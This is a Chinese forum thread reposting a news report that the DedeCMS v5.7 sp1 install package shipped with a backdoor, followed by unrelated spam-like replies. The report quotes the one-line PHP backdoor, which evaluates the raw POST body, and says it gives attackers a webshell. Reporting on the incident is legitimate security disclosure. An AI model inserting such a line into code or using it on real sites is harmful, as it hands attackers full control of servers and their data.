关灯
开启左侧

[dedecms] 织梦CMS系统被曝植入后门 70万网站资料或泄露

[复制链接]
kjeittccdf 发表于 2015-3-30 15:29:14 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
 
网易科技讯 3月22日消息,瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7  sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。
据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)

织梦dedeCMS中被植入的后门代码

织梦dedeCMS中被植入的后门代码

织梦CMS中被植入的后门代码

延伸阅读:

 

精彩评论15

正序浏览
seazvyt 发表于 2016-1-18 18:21:39 | 显示全部楼层
 
为了不让帖子沉得太快!!!为了人人知道这个~!! 我不是原创~!!但是我要把他发扬广大~!!!
 
wwzcdenleclv 发表于 2016-1-18 18:20:50 | 显示全部楼层
 
今天统计好像出了问题
 
mwxny 发表于 2016-1-18 18:22:01 | 显示全部楼层
 
哈哈~` 你好有意思哦~
 
seazvyt 发表于 2016-1-18 18:20:56 | 显示全部楼层
 
来电来函..欢迎洽购...
 
wwzcdenleclv 发表于 2016-1-18 18:22:22 | 显示全部楼层
 
哎 天理何在啊??
 
wwdu926a 发表于 2016-1-25 18:04:15 | 显示全部楼层
 
有现实中的偶在这...不佩服.............佩服电影里的....
 
tohme 发表于 2016-1-25 18:04:53 | 显示全部楼层
 
我想骂我自己
 
buingeEvineus 发表于 2016-1-25 18:04:36 | 显示全部楼层
 
真是天底下好事多多
 
wwdu926a 发表于 2016-1-25 18:04:08 | 显示全部楼层
 
k了我一个月的站,刚才site的时候
 
wwzcdenleclv 发表于 2016-1-25 18:04:11 | 显示全部楼层
 
这个站一周前刚刚有了点起色
 
wwzcdenleclv 发表于 2017-4-11 15:12:47 | 显示全部楼层
 
哥们,给我做个链接吧
 
Acropozelan 发表于 2017-4-11 15:06:28 | 显示全部楼层
 
晚安 别让小嫁再郁闷了 -
 
seazvyt 发表于 2017-4-11 15:12:13 | 显示全部楼层
 
看,刚说你眼神不好,你还就来劲了不是.
 
Mqokjdvq 发表于 2017-4-11 15:12:13 | 显示全部楼层
 
我不知道他说的是什么啊~~
 
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


0关注

1粉丝

392帖子

热门图文
热门帖子
排行榜
作者专栏

关注我们:微信订阅号

官方微信

APP下载

全国服务Q Q:

956130084

中国·湖北

Email:956130084@qq.com

Copyright   ©2015-2022  站长技术交流论坛|互联网技术交流平台Powered by©Discuz!技术支持:得知网络  

鄂公网安备 42018502006730号

  ( 鄂ICP备15006301号-5 )